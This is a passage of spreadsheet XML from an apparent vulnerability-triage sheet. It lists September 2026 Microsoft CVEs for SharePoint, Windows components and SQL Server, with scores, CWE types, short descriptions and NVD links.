      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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1" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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4" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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5" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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8" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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1" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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2" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73016</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73028</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73028</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77480</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77481</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77482</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
